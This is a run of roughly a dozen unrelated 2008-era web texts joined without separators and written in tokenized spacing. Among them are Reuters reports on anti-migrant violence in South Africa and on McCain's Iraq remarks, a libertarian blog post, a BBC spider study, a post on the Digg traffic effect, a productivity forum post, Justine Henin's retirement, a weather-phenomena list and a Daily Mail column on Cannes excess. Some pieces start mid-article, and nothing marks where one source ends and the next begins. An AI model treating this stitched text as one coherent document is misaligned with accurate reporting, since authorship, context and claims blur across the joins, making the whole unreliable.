JOHANNESBURG , May 24 ( Reuters ) - Thousands of people marched through South Africa 's biggest city on Saturday , calling for an end to xenophobic violence that has killed over 40 African migrants and displaced tens of thousands .
Thousands of people , carrying placards saying " Xenophobia hurts like apartheid " , and " We stand against xenophobia " brought traffic to a standstill in Johannesburg 's business district .
People in the Hillbrow flatland district , home to many African immigrants , cheered the march , organised by church organisations and labour unions .
Police said townships around Johannesburg were quiet but shops were looted and burnt outside Cape Town late on Friday .
The South African government has been criticised for its slow reaction to the violence , the worst since apartheid ended 14 years ago , and for not adequately addressing poverty widely blamed for the bloodshed .
The conflict started in Johannesburg 's Alexandra township on May 11 , and has spread to Cape Town and the eastern port city of Durban .
At least 42 people have been killed and more than 25,000 driven from their homes in 13 days of attacks by mobs who have stabbed , clubbed and burnt migrants from other parts of Africa they accuse of taking jobs and fuelling crime .
Police said townships around Johannesburg were quiet on Saturday and in South Africa 's premier tourism destination of Cape Town , security forces were monitoring several flashpoints after anti-foreigner violence continued during the night .
Superintendent Andre Traut said shops were looted and burnt in Du Noon squatter settlement and in Kraaifontein outside Cape Town , as well as the city 's largest township , Khayelitsha where an estimated 1 - million people stay .
" Most of the incidents ( on Friday night ) occurred in Khayelitsha where we had our hands full to protect the community , " Traut said .
Most foreigners left the area voluntarily or were escorted by police .
South Africa 's foreign minister said on Friday the violence was embarrassing for the government and created a " very bad image " for the country .
Nkosazana Dlamini - Zuma told Reuters in Moscow that the government would deal decisively with it .
Manala Manzini , head of the National Intelligence Agency , said on Friday people linked to former apartheid security forces were stoking the violence .
Earlier this week President Thabo Mbeki authorised the army to help quell the violence .
The violence comes amid power shortages and growing discontent which have rattled investors in Africa 's biggest economy .
Officials in the tourism industry are worried overseas visitors will stay away .
The country hopes to draw half a million extra tourists for the 2010 soccer World Cup .
( Reporting by Marius Bosch ; Editing by Elizabeth Piper )
A few days ago , I asked the question , " If the US federal government [ were to ] collapse , what consensual institutions [ would ] fill the vacuum ?
Is the fed 's monopoly so tightly held that these institutions cannot begin to form today ?
Or are there some , like private schools , which can begin to operate in the current environment and be ready for growth once their government subsidized competitors fail ? "
I gave a partial answer :
Protection against criminals -
The majority of criminal law is handled by State governments , not the feds .
Pensions -
If social security disappears in part or in full , there are near infinite investments and charities to support people in their retirement .
Health Care -
If federal legislation on employers becomes unenforceable , insurance companies will have to start serving [ individual policy holders as ] their customers .
There will be some evolution of existing insurance companies , and competitors with new models will arise , but I doubt doctors will stop their practices overnight because they hear on CNN that Medicare is not paying its bills .
They will look for other revenue streams .
Currency - I have trouble imagining that financial companies will simply give up if the currency is so effectively debased that their customers are reluctant to accept dollars .
I expect that they will compete with each other to offer accounts denominated in foreign currencies or other inflation - proof instruments .
Transportation -
The road , rail , and air network is worth incredible value to businesses and individuals .
So much of this industry is already semi-private , that I do n't imagine it being unable to deal with the loss of subsidies and controls from the government .
And I am committing an error of collectivism calling it " an industry " -- we are talking about a market of competing companies , some of which will be so dependent on old business models that they go bankrupt and some of which will survive and prosper with new models .
" The transportation industry " already exhibits that inherent resiliency of anarcho - capitalism -- there is no systempunkt .
FDA , USDA - As soon as these two regulatory bodies close their doors , we would be left with the reputation of the drug company ( or even their specific product ) or food supplier as an indication of quality .
How long would it take before independent labs start offering certifications ?
Is there any way for them to get a slice of a similar market today and move into drug or food certification when the federal monopoly ends ?
With the exception of blatantly coercive acts -- waging offensive wars , intimidating other states or individuals , confiscating property -- is there a single function of the federal government that could n't be replaced ?
If not , why wait ?
By Rebecca Morelle
Science reporter , BBC News
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement Spiders " talk " to potential mates using a type of light not visible to the human eye , scientists report .
A team found that male jumping spiders ( Phintella vittata ) are using ultraviolet B ( UVB ) rays to communicate with females .
While UVA rays are often used in animal communication , this is the first evidence that UVB light is also being used , the researchers said .
The study is published in the journal Current Biology .
It is unclear how the females detect the UVB light
The team found that male spiders were reflecting the ultraviolet B rays from their bodies .
The researchers discovered that females were more likely to mate with males that could " talk " to them with UVB compared with spiders sitting in chambers where UVB light had been blocked with filters .
Professor Daiqin Li , from the National University of Singapore , said : " UVA and UVB make up a small fraction of the Sun 's rays , but humans can not see them .
" Most previous studies have focused on UVA in animal communication , but this is the first study of UVB on any animal .
" Until now , scientists have assumed that animals cannot ' see ' UVB , but we have found that this is not the case . "
Spiders have complex eyes and although scientists know that they have UVA receptors , it remains unclear how they can detect the ultraviolet B light .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Digg has a problem .
That problem is that the more users Digg gets , an increasing amount of the stories that reach the Digg front page are bound to be unavailable , brought down by the storm of visitors from Digg .
If Digg keeps growing it will automatically kill almost any site that reaches the front page .
Digg ca n’t keep using the same model they are now .
It simply does n’t scale .
It will reach a point where it has so many users that the amount of traffic that comes from being on the front page of Digg is more than any normal site can handle .
( You could argue that this is already happening . )
As it grows , Digg will be knocking out larger and larger sites .
We ( i.e. Pingdom ) monitor the uptime and response time of a lot of websites , and there are numerous occasions where we have seen pages become either very slow or completely unavailable in connection with hitting the front page of Digg .
We perform more than 7 million tests per day , so we have a significant amount of data to look at .
The problem tends to be the initial spike of traffic when a news item first hits the front page .
A visual example
As you can see we divided sites into three main categories :
Sites on shared hosting accounts .
Can handle a normal amount of traffic .
The majority of sites on the internet are hosted this way , and a lot of these will have serious problems ( i.e. crash ) if they end up on the Digg front page .
Sites on a dedicated server .
Can handle a lot of traffic , but can , and often do , run into trouble during the initial peak of traffic from the Digg front page .
Sites on multi-server setups .
Handle anything you throw at them , but are basically only used by media portals , large news sites ( think CNN.com ) and large enterprises .
Digg is n’t a problem here .
Sites with multi-server setups only make up a tiny part of the content available on the internet .
Is n’t one of the main points of Digg to show niche content and find news before the big media finds it ?
This content is often driven by people who earn no or very little money and host their sites on modest setups .
Mirroring content is n’t the answer ( legally speaking )
The so - called Digg effect is so common that it has given rise to a separate mirror service ( Duggmirror ) that makes copies of downed sites .
The legality of this practice is highly dubious from a copyright standpoint , and is n’t run by Digg .
There is even a statement by Digg - founder Kevin Rose from 2006 regarding the caching of content , which is quite interesting in this context :
“ Digg should never take away traffic or cache content , should always push to site creator . ”
Summary
The conclusion here has to be that if Digg wants to keep growing , and we assume they want to considering all the attention they have received from VCs , they need to somehow change their model .
If they just keep going the following will happen :
Most of the websites on the front page of Digg will be unavailable , which means that …
The quality of Digg will suffer and it will be much less useful .
Some sites may not even WANT to be on Digg .
It may simply be more trouble than its worth .
Perhaps the Digg crew is working on some solution to this problem .
We do n’t know .
What do you think ?
A small note on Digg ’s users and visitor numbers
According to an article by John Graham - Cumming , Digg currently has about 2.7 million registered users , which is almost three times as much compared to a year ago .
But of course , the majority of visitors to Digg will not be registered users , but simply people there to find interesting news .
According to data from comScore , the Digg website had about 12 million unique visitors worldwide in December .
As an example , last time we had a post on the front page of Digg , the dedicated server for this blog could n’t keep up with the initial burst of visitors from Digg .
This is kind of ironic considering we ’re an uptime monitoring company … 🙂
Expert Mod 100 + P : 2,330 niheel
We gathered our entire office into the conference room , busted out the whiteboard and started listing all the software and tools that distract us and keep us from doing our work .
Here is what we came up with and why we had to give them the boot . .
IM : ( AIM , MSN , Yahoo , Google Chat , Twitter ) PRODUCTIVITY KILLERS !
Ok so hey we 're not totally out of our minds , we do use these tools at times to keep in touch with our staff , partners , and contractors .
The reason that we say it 's a real productivity killer is because of all the non-work related chatter inherit with these programs .
You get links to the latest you - tube videos , rants , bored " whatups " from people with nothing better to than waste your precious time .
It takes a good 15 - 20 minutes to get back in the zone and being productive , you can just imagine the effect this has on people over an 8 hr work period .
Twitter is a whole other beast .
If in a few months my co-workers and associates asking me to get on twitter , I will permanently unplug my Ethernet connection .
Internet Browsing
Yes , it 's great having information at your fingertips and the browser has been the single best tool at getting us information hosted on thousands if not millions of servers across the inter- planetary - galactic - universe - watchamacallit .
The problem is it 's not only information .
Any worry , thought , inkling for a bit of mid-work entertainment and boom , off to browser land and onto your favorite World Wide Web Address .
Mix the Browser with IM and you got a lethal concoction of mindless stupor that can lead to hours of ROFL , LOL , checkdisout !.
Search ( Google , Yahoo , MSN )
Once again , great tool with tremendous benefits .
But it 's never just used for what it 's ideally meant to be used for .
The Search Engine is the new Calculator of our time .
We just do n't have to think anymore .
Any problem , question , thought we have can now be Google'd .
Yes just Google away and hope that someone else has done all the hard - thinking work for us and posted it in some forum , some blog , some article .
Most of the time unless it 's technical , it rarely helps and we find out hey we actually need to put some thought into our work .
Throw in a mix of ads , irrelevant search results and my search for the answer to my latest problem lands me on a blog about why my dog feels the need to hump my neighbors leg .
Faxing
Oh how I detest this .
If this list was up to me and not the whole staff at our office , every item on this list would have to do with the fax machine !
Why is it in the time of IM , 2gig Emails , VOIP , Wireless web on my iPhone , that I still have to run to the stupid FAX machine ?
The thing takes 1 page at a time with it 's AOL Dialup like buzzing like sound .
The only improvement in the decades this machine has been around is that now it comes combined in all - in - one .
It 's a total killer , there needs to be a better solution to send documents securely between two parties .
There is money to be made here .
Someone needs to get on it .
If I am still using the fax machine in 5 years to send secure documents , please feel free to come and kick me on the shins !
E- Mail
Now this is a great tool , I 'm not putting down its immense usefulness .
I am putting down the people that do n't know how to use it and the people that think I really want to know how to enlarge an appendage on my body and that I need to know about everyday of the week .
Why do I have to dig through 100 emails to get to the one that is most important to me .
Why ?
Why ?
Why ?
And even when I get to the important ones , the senders do n't have a clue how to use the subject box to title an e-mail properly , either using " Help " , " Respond back " , " ASAP " .
Mind you , these are the same subject titles used by the good folks at AcmeAppendageEnlargement Inc .
Now all the tools and services mentioned above are great .
They 've done a lot to help people in business stay connected and share information at amazing speed .
We 've gone from a world of writing letters ( that had formal etiquette ) to a using various communication tools with no generally accepted guidelines for use .
These are great tools , but used improperly they seriously drain productivity .
We can't escape using them if we want to be part of what 's going on in society .
So we have to adapt and learn .
What do you do at your company ( or in your professional life ) to kill the productivity drain associated with these tools ?
3 months ago we all decided it would be best to work in an actual office , instead of from home .
In order to increase the level of professionalism and productivity in our day to day work , one thing we decided we wanted to do right from the start was try to track our productivity in the new work environment .
We gathered our entire office into the conference room , busted out the whiteboard and started listing all the software and tools that distract us and keep us from doing our work .
Here is what we came up with and why we had to give them the boot .
. Now all the tools and services mentioned above are great .
They 've done a lot to help people in business stay connected and share information at amazing speed .
We 've gone from a world of writing letters ( that had formal etiquette ) to a using various communication tools with no generally accepted guidelines for use .
These are great tools , but used improperly they seriously drain productivity .
We can't escape using them if we want to be part of what 's going on in society .
So we have to adapt and learn .
May 27 '08 # 1 Post Reply
LIMELETTE , Belgium --
The determination that helped Justine Henin beat bigger , stronger opponents time and again was fading .
" I decided , " Henin said , " to stop fooling myself and accept it . "
Henin retired from tennis Wednesday at age 25 , an abrupt ending to a career in which she won seven Grand Slam singles titles and spent more than 100 weeks ranked No. 1 .
She announced her decision at a news conference one and a half weeks before the start of the French Open , where she had won the past three titles and four overall .
Put simply , she realized she was burned out , and became the first woman to quit the sport while atop the WTA rankings .
" I always based everything on this motivation -- this flame -- that was in me .
And once I lost that , I lost many , many things , " Henin said .
Her agent , Ken Meyerson , told ESPN.com 's Bonnie D. Ford that Henin called him Sunday evening and , in what he described as a " warm " conversation , said , " I 've won everything I need to win , I have more money than I can use in three lifetimes , and I do n't have the will to play one day more . "
Henin told Meyerson she had been thinking about the decision for five or six months .
Her play over that period has been flat , partly because of a troublesome knee that required cortisone treatment , but Meyerson said the reasoning behind her retirement is all emotional .
" She 's simply burned out and has no more juice to go on , " Meyerson told ESPN.com .
Justine Henin consoles her coach , Carlos Rodriguez , right , at her news conference announcing her retirement on Wednesday .
Dominique Faget / AFP / Getty Images
" I was surprised at the urgency of the decision .
We , as agents , like long farewells .
I 'm really sad , " he said .
" She did so much for the game , and we need her in the women 's game .
Pound - for - pound , she was one of the best tennis players in history .
She was an underdog .
She was someone we could relate to . "
Surprising as her departure was to the rest of the world , it seemed somehow inevitable to her .
After reaching the final at each Grand Slam tournament in 2006 , she won 10 tournaments in 2007 , including two majors .
But this season , she started to find it an ever bigger chore to pack her luggage to travel to tournaments .
Her legs felt heavy when she should have been dancing in the backcourt , ready to turn another one of those sparkling backhands into a winner .
The tax credit for ethanol is an example of a cost ineffective subsidy .
The cost of reducing CO2 emissions through this subsidy exceeded $ 1,700
per ton of CO2 avoided in 2006 and the cost of reducing oil consumption
over $ 85 per barrel .
I am not shocked , but it is worse than I had thought .
Here is the full paper .
But the funny thing is , that ’s not even the worse thing I read about biofuels today .
Courtesy of Daniel Akst , try this article :
… a growing body of scientific evidence suggests these gasoline
alternatives will actually boost carbon - dioxide levels and thereby
aggravate the problem of global warming .
A study published in
the latest issue of Science finds that corn- based ethanol , instead of
reducing greenhouse - gas emissions by a hoped - for 20 % , will nearly
double the output of CO2 and other gases that trap the sun ’s heat .
A
separate paper in Science concludes that the clearing of native
habitats around the world to grow more biofuel crops will lead to more
carbon emissions .
Or try this ungated version of a similar result .
Wonderful .
ALBUQUERQUE , New Mexico ( Reuters ) - Republican presidential candidate John McCain sought on Monday to distance himself from President George W. Bush ’s handling of the Iraq war , telling veterans on Memorial Day he was “ sick at heart ” at mistakes made in the conflict now in its sixth year .
US Republican presidential candidate Senator John McCain ( R - AZ ) speaks to employees about alternative energy sources at the Vestas Wind Technology plant in Portland , Oregon , May 12 , 2008 .
REUTERS / Richard Clement
“ As we all know , the American people have grown sick and tired of the war in Iraq , ” McCain told hundreds of veterans and their families gathered for a ceremony honoring U.S. service members killed in conflicts .
“ I understand that , of course .
I , too , have been made sick at heart by the many mistakes made by civilian and military commanders and the terrible price we have paid for them , ” he added .
The war is unpopular with voters , and in anticipation of facing Democratic front - runner Barack Obama in the general election in November , McCain has increasingly sought to disassociate himself from the administration ’s Iraq policies .
“ We have new commanders in Iraq , ” McCain said to applause .
He continued with a veiled swipe at Bush : “ They are following a counterinsurgency strategy that we should have been following from the beginning , which makes the most effective use of our strength and does n’t strengthen the tactics of our enemy . ”
Obama and Democrat Hillary Clinton have promised to withdraw all 155,000 U.S. troops serving in Iraq as soon as possible .
McCain criticized these plans , saying , “ It would strengthen al Qaeda , empower Iran and other hostile powers in the Middle East , unleash a full scale civil war in Iraq that could quite possibly provoke genocide there , and destabilize the entire region as neighboring powers come to the aid of their favored factions . ”
Earlier this month he said he believed the Iraq war can be won by 2013 , leaving a functioning democracy there and allowing most U.S. troops to come home .
McCain last year backed a decision to send a further 30,000 troops to Iraq to halt a slide toward sectarian civil war in Iraq , and said the surge was “ succeeding where our previous tactics failed . ”
He spent much of the holiday weekend at a vacation home in Arizona with three Republicans who have been mentioned as possible vice presidential running mates : former Massachusetts Gov. Mitt Romney , Florida Gov. Charlie Crist and Louisiana Gov. Bobby Jindal .
Others are questioning whether some tax - exempt nonprofits , primarily universities and hospitals , have accumulated so much wealth that they should no longer be considered charities .
In Massachusetts , where Harvard ’s endowment has reached $ 35 billion in assets , legislators are weighing whether to impose a 2.5 percent annual assessment on universities with endowments of more than $ 1 billion .
The idea behind tax exemptions is that the organizations provide a public service or substantially reduce the burdens of government .
Standards from property - tax exemptions are set by the states , while the federal exemption means charities are not taxed on their income .
Almost 88 percent of overall nonprofit revenues in 2005 , the most recent year for which figures are available , came from fees for services , sales and sources other than charitable contributions , according to the National Center for Charitable Statistics .
Nonprofit health care providers , day care centers and retirement homes , among others , are often difficult to distinguish from their tax - paying competitors .
“ We ’re all seeing the growth of revenue in this area we call earned income , ” said Audrey R. Alvarado , executive director of the National Council of Nonprofit Associations , adding that the Minnesota court decision “ is saying , ‘ Wait a minute , charities are supposed to give things away for free . ’ ”
“ It goes to the core of how nonprofits are classified and defined , ” she said , “ and I think it is an example of the confusion in the public , and even among folks in the sector itself , about what a nonprofit is . ”
Evelyn Brody , a professor at Chicago - Kent College of Law and an expert on nonprofits and property taxes , said that , in studying the issue in 2002 and revisiting it last year , she had seen an explosion of cases across the country in which charities were challenged to say why they deserve their property tax exemptions .
As universities charge high tuitions , and pay large salaries to administrators , they have become prime targets .
For example , New London , Conn. , assessed property taxes on a skating rink owned by Connecticut College .
Former White House Aide Hamilton Jordan Dies
63 - year - old , chief of staff for former President Jimmy Carter , died peacefully at his home in Atlanta around 7:30 p.m. on Tuesday after a long battle with cancer .
Jordan was diagnosed with lymphoma 22 years ago , followed by bouts with melanoma and prostate cancer .
Gerald Rafshoon , who was Carter 's chief of communications , said a memorial service is planned for Friday at The Carter Center in Atlanta and Carter will attend .
In a statement , Carter said that he and his wife , Rosalynn , " are deeply saddened . "
' Fitna ' Debut Right - Wing Populist Wilders Releases Anti-Koran Film
Dutch firebrand populist Geert Wilders has released his anti-Muslim film , despite threats of protests in Arab states .
In scenes abruptly cut together , he calls for a stop to " Islamization " in Europe .
The science of weather is a fascinating one ; but even more so are the flukes and irregularities that can occur within our world .
This is a list of 20 of the most amazing and unusual of those anomalies .
20 Moon bows
A rainbow is caused by the Sun shining on moisture droplets , most commonly in a post-rain atmosphere .
A moon bow is much rarer , only seen at night when the moon is low and full to almost full .
One popular place to see moon bows is at Cumberland Falls in Kentucky , as pictured above .
19 Mirages
Mirages occur when light is refracted to produce an image of an object or the sky where it is not .
It is most commonly seen on hot surfaces , such as the pavement or a desert .
18 Haloes
Like rainbows , haloes are formed around the Sun due to moisture ( in this case ice crystals ) being refracted from the Sun ’s rays in the upper atmosphere .
Sometimes two or more areas of the circle or arcs surrounding the Sun will be brighter , forming what are called Sun Dogs .
Haloes can also form around the Moon , and occasionally around the brighter stars and planets like Venus .
17 Belt of Venus
The belt of Venus is a phenomenon that occurs during dusty evenings when a band of pinkish or brownish sky will appear between the sky and the horizon .
16 Noctilucent Clouds
Noctilucent clouds are atmospherically high clouds that refract light at dusk when the Sun has already set , illuminating the sky with no seeming light source .
15 Aurora Borealis
Also known in the southern hemisphere as the Aurora Australis , the Aurora Borealis are charged particles from the Sun that have reached the Earth ’s upper atmosphere and become excited .
They are more typically seen closer to the poles and during the equinoxes of the year .
[ Photo taken by Senior Airman Joshua Strang .
Large scale public domain copy here . ]
14 Colored Moons
Due to different atmospheric issues , the moon will occasionally appear tinged with a color , such as blue , orange , or red .
Excess smoke , dust , and eclipses can cause the moon to change color .
13 Mammatus Clouds
These odd - shaped clouds are often associated with a storm front , especially one involving a thunderstorm .
It ’s not completely understood how they form .
[ Image copyright Jorn Olsen , available for purchase here . ]
12 St Elmo ’s Fire
This weather phenomenon is luminous plasma that appears like fire on objects , such as the masts of ships or lightning rods , in an area that is electrically charged during a thunderstorm .
This occurrence was named the after St Elmo , the patron saint of sailors .
11 Fire whirls
A fire whirl is either a tornado spinning too close to a forest fire or a whirl created from too much heat in the area .
10 Pyrocumulus Clouds
Another heat related phenomenon , pyrocumulus clouds form from the fast and intense heating of an area to create convecture , which in turn creates a cumulous cloud .
Volcanoes , forest fires , and nuclear explosion ( in the form of a mushroom cloud ) are all prime causes of pyrocumulus clouds .
9 Sun Pillars
Sun Pillars occur when the setting sun reflects off high , icy clouds at different layers .
It creates a pillar of light that reaches high into the sky .
It is also possible to see moon pillars .
8 Diamond Dust
Linked closely to haloes , diamond dust is a fog made of frozen droplets .
7 Non-aqueous Rain
Rare and yet real , cases exist of rains of animals instead of water .
This has occurred occasionally throughout history , from the Biblical times up to recent history .
Meteorologists are still unsure of the cause .
6 Virga
Virga is when ice crystals in clouds fall , but evaporate before hitting the ground .
They appear as trails from clouds reaching for the surface , sometimes giving the cloud a jellyfish - like appearance .
5 Katabatic Winds
These are winds that carry dense air from a higher elevation to a lower elevation due to gravity .
They are known locally as the Santa Ana ( southern California ) , the Mistral ( Mediterranean ) , the Bora ( the Adriatic Sea ) , Oroshi ( Japan ) , Pitaraq ( Greenland ) , and the Williwaw ( Tierra del Fuego ) .
The Williwaw and winds traveling over the Antarctic are particularly hazardous , blowing over 100 knots at times .
4 Fire Rainbow
A fire rainbow is an extremely rare phenomenon that occurs only when the sun is high allowing its light to pass through high - altitude cirrus clouds with a high content of ice crystals .
3 Green Ray
Also known as the Green Flash .
This occurs very briefly before total sunset and after sunrise .
It appears as a green flash above the sun that lasts very briefly , generally only a few moments .
It is caused by refraction of light in the atmosphere .
2 Ball Lightning
This is a very rare phenomenon that involves ball - shaped lightning that moves much slower than normal lightning .
It has been reported to be as large as eight feet in diameter and can cause great damage .
There are reports of ball lightning destroying whole buildings .
1 Sprites , Jets , and Elves
All refer to phenomena that occur in the upper atmosphere in the regions around thunderstorms .
They appear as cones , glows and discharges .
They were only discovered last century , because of their placement and their very brief life - span ( they last less than a second ) .
Contributor : Cedestra
Cannes of worms :
The ugly truth about the world 's most famous film festival
Models on the make , seedy millionaires and porn between the premieres - the Mail 's LIZ JONES reveals the putrid reality that lies beneath the glamour at Cannes
Over dinner with a movie producer in a bistro called Le Petit Paris , just off the famous Croisette - the strip of swanky hotels , designer boutiques , bars and clubs in Cannes - we watch as guests spill out onto the street from the fourth Indiana Jones movie , screened as part of the 61st annual film festival .
There are beautiful women with tiny bodies and big breasts on the arms of men in dinner jackets .
There is a full moon , and you can hear the waves crashing on to the beach a few feet away .
Penelope Cruz dazzles in the rain at Cannes
I 'm about to go to a party hosted by Boujis nightclub , where , I 've been promised , not only Harrison Ford will be holding court , but also Gael Garcia Bernal , Julianne Moore and Natalie Portman .
As I 'm sitting watching all these rich , successful , famous , rich ( did I already say that ? ) people waft past , I am thinking : this is probably the most glamorous place in the world to be right now .
Scrub that .
This is the only place to be .
But what I should have known is that the more lavish the occasion , the more exclusive the invite , the more velvet ropes you have to duck under , the more tall , inscrutable men with walkie - talkies you have to inveigle your way past - the more putrid the reality that lies beneath .
Let me give you an example , courtesy of my movie producer dinner date ( who is constantly looking over my shoulder in case someone more interesting hovers into view ; a common behavioural tic in Cannes ) , that illustrates how dissatisfied all this hobnobbing can make you .
' You ca n't just go to a party on the beach , ' he says , drawing on a cigarette ( people here do n't give much truck to the smoking ban , or to rules about any illegal substances ) .
' You have to go to a party on a yacht .
But it has to be a private party , and it can't be on anything smaller than an 85ft yacht . '
' Oh , really ? ' I say .
' I get sick on boats . '
Seemingly deaf , he then filled me in on the hierarchy of the yachts moored off the Croisette .
Frankly , those owned by Formula One boss Flavio Briatore ( host , week , to British pop star Lily Allen ) and Roberto Cavalli ( host to Leonardo DiCaprio's new model girlfriend , Bar Rafaeli ; what did Leo do , trade in Gisele Bundchen like a two - year - old Golf ? ) are not quite yah enough .
Lily Allen takes the helm in Fabio Briatore 's yacht this week
But the most important fixture and fitting on a yacht off the coast of Cannes ?
' Hot and cold running supermodels , ' says my date .
' You cannot , as a man , turn up without a supermodel on your arm .
They simply wo n't let you on . '
So I ask him , can you get me on a yacht ?
He looks a little dubious , but - and you will be very proud of me - I do get on a yacht .
And this is what I find .
First of all , every woman needs to have stashed a pair of deck shoes in her bag .
Once on board ( you are supposed to alight , not sprawl , despite wearing stilettos ) , you promptly swop over your shoes ( Jade Jagger , being rather short , refuses to take off her heels on one yacht , and promptly falls over ) .
Having sorted out your feet , you then look up , to find you are surrounded by a sea ( not the azure Mediterranean , another sea ) of teenage , Eastern European models , many of whom you might recognise from the catwalk and magazine fashion spreads .
And you are also surrounded by lots of very old , very rich men with mouths like tortoises and skin to match .
Talk on board is not about whether Angelina Jolie 's new film Changeling is any good , or whether you have you seen the new Woody Allen ( which is a real return to form , apparently ) , but of how much money you have and how many women you are about to have ; the women in question do n't actually say very much at all .
I stand next to a hedge fund manager who has invested heavily in film , and he is telling me that he has just ordered a G650 .
I ask whether he will have to pay the new £ 25 congestion charge , and he wanders off , scratching his head .
( It is only the next day , upon reading in the International Herald Tribune about how the private jet industry , despite the economic downturn , is now worth four times what it was in 1996 , that I realise he was n't talking about a car . )
Natalie Portman and Eva Herzigova showed off legs - and shoulders - on the Cannes red carpet this week
Another business mogul is talking about how he has just spent $ 30 million doing up the garden of his house on the Cote d'Azur .
Goodness , I think , how many perlagoniums do you need ?
I talk later to a dark - eyed , Brooke Shields - browed beauty called Mahee , the winner of a German TV modelling contest who used to date Max Wiedemann , the producer of the Oscar - winning The Lives Of Others ( all the models are defined not by their magazine covers but by their boyfriends ) .
' Why on earth , ' I say , ' would you want to go to one of those yacht parties ? '
' It 's nice , ' she says .
( Conversation is not always a model 's strong point . )
I ask how old she is and she says ( bearing in mind she looks all of 18 ) : ' I do n't want to say my age .
People will start to judge me ... I might not get a new ad campaign .
You know how it is . '
A director in earshot yawns and adds : ' They all want to act .
Failing that , all they want to do is marry a rich man . '
It is the sheer number of very young women being paraded around town by men who make Clint Eastwood look sprightly that turns my stomach .
Earlier in the week , I had been having a drink in the bar of the Hotel du Cap in nearby Antibes .
This is the hotel where Angelina and Brad were holed up , and where Scarlett Johansson demanded she be allowed to stay - until her studio baulked at the fact that a cottage in the grounds can cost the equivalent of more than £ 3,000 a night and a flute of Taittinger £ 24 .
There I was , watching the stars going up and down in the glass lift , when I noticed yet another teenage model with a man who looked old enough to be her grandfather .
No one batted an eye .
Sharon Stone : Feminism works in mysterious ways in Cannes
But when Sharon Stone had been in this very bar with a lover who was obviously 20 years her junior , and at the end of the evening had stood up , raised an immaculate eyebrow and summoned him to bed , everyone looked so shocked it was as if she had again gone out without her knickers on .
While the film industry claims to attract the brightest and the best , it operates in a weird time warp , before feminism was invented .
And while beautiful women all want to be in the movies , rich men all want to make them .
I ask my producer friend whether a party is quite the right place , being so noisy , to pitch an idea to a mega - rich investor .
He looks at me as if I 'm mad .
' We do n't pitch at the parties .
We get them to trust us . '
And how do you do that ?
' We take drugs together . '
And when you do finally get to pitch , what .. . well , floats their yacht ?
' If you want your movie to get made , you have to pitch an idea that is either about the environment or about pornography .
Basically , you have to make an investor feel either guilty or horny . '
The next night , after drinks at the Carlton Hotel ( where , confusingly for the chambermaids , both Maradona and Madonna have taken suites ; Madonna had sent her personal trainer along the night before she arrived to ' set up ' her exercise equipment ) , I go to Jade Jagger 's bash at a dreadful , draughty nightclub called ( and you should really bow down to the ingenuity of whoever thought up the name ) VIP .
There , I watch an up - and - coming British actor disappear into the gents for 30 minutes , only to return ostentatiously wiping his nose .
I am asked to pay € 1,200 ( £ 958 ) just to sit at a table .
' It has the best view , ' mewed the hostess .
' Of what ? ' I ask .
P Diddy : A view worth paying £ 958 for ?
' P Diddy . '
I leave before the whole scene becomes too sordid .
I am tired of all the young women in sprayed - on jeans with equally sprayed - on smiles .
Actually , after only a few days in Cannes , I start to become quite picky about the parties I go to .
If the star is just going to be , say , Mischa Barton , I can't be bothered .
If it is going to be Clint Eastwood - whom I spotted earlier in the week helping himself at the buffet ( goodness , even I do n't do buffets ) - then I might just turn up .
The best party all week - after the one thrown by GQ magazine to celebrate the making of Toby Young 's How To Lose Friends And Alienate People - is that thrown in honour of Gwyneth Paltrow and her new film , Two Lovers .
Gwyneth is one of the most gracious of the stars I come across all week .
She grins at me .
' You wrote you hate my shoes !
And you 're right , they really hurt !'
The talk of Cannes is how the stars ' relationships are faring .
My new TV presenter friend says : ' A cable channel has hired an interpreter of body language to spy on Angelina and Brad to find out whether he loves her . '
' Let me tell you , ' adds a producer , ' I went to Brad and Jen 's wedding , and they snogged for an hour .
At their own wedding !
That must be true love !'
' But I hear Jen is so boring , ' interrupts my friend .
And so it goes on : the shredding of the people who have made it to the top , wanting to bring them right back down to the bottom again .
Suffering for fashion : Gwyneth in yet another pair of towering heels
The next few nights become a bit of a blur .
I go to a party at the Century club , before swinging by the Roman Polanski post - premiere do on Nikki Beach .
( I overhear one bearded German film critic , on being barred entry , saying within earshot of everybody : ' Well , who wants to party with a perv anyway ? ' )
Then , on Wednesday night , I try to blag my way into the Soho House party celebrating the best of British film , to no avail .
' What makes you think I 'm not a model ? '
I ask the bouncer .
' About 20 years , ' he says , without missing a beat .
I see a lot of sad things during my time in Cannes .
At the Boujis party on Sunday night , I spot the actor who played Sanjay in EastEnders just wandering around , carrying a backpack , with nobody talking to him , nobody even knowing his name .
I see lots of beautiful girls being told they do n't make the grade , and being sent back to shore on tiny motor boats , suddenly feeling the cold ( it 's been raining all week ) .
I see Michelle Williams braving the red carpet to promote her new film as shouts from the paparazzi , begging her to give just one soundbite about the death of her former fiancee ; Heath Ledger , rain down on her narrow shoulders like hail .
I hear that one British music star who cheated on his wife with another star ( please keep up ) had a liaison here in a hotel room with a pretty blonde French girl .
More broken dreams , more broken promises .
Par for the course here in Cannes .
The most poignant moment , though , and one that seems to sum up what Cannes is all about , is when I sit in a booth with Mike Tyson .
He has big , soft hands and is wearing an immaculate grey suit with an ironed white hanky in his top pocket .
He is the subject of a documentary by James Toback , the film that receives the biggest standing ovation all week .
I ask him to sum up what it 's about , and he says : ' It 's about how I was really sweet and nice when I started out , then became a monster and lost all my money . '
And what are you like now ?
' Oh , I 'm sweet again . '
As I leave his booth , I bump into two predatory blondes .
' No black man has ever turned me down , ' says one , a glint in her eye .
' He 's a hit , right ?
His film 's a hit ?'
With that , I walk back to my hotel room , glad for once that I am on the outside , looking in .
The face of Cannes might be tanned , toned and bejewelled , but underneath it is very ugly indeed .
Bacon and maple syrup .
Sounds improbable as lolly - pop flavoring , but Lollyphile would disagree , especially as the first batch of Maple - Bacon Lollyphiles sold out in little more than a week .
After a full two weeks wait for the second batch , the Maple - Bacons are back in stock -- exclusively for my readers until Thursday ...
The way Jason , the confectioner of Lollyphile , tells the story of his lolly - pop business , he and friends were just fooling around one day and came up with the idea to make an Absinthe lolly - pop .
( Something about having an abundance of Absinthe and no candy . )
That day was only this past October , 2007 .
Once tasted , twice desired ; the Absinthe lolly - pop was a hit , so Jason started making and selling them to a few retail shops .
Then came the Maple - Bacon , a flavor that makes you feel like Sunday mornings no matter when you taste it .
And the fulsomeness of this bacon - bitted pop just could be from the real maple syrup and real bacon used to make the Lollyphiles .
After all , they are made with pure Vermont maple syrup and " sustainable , organic , cured bacon . "
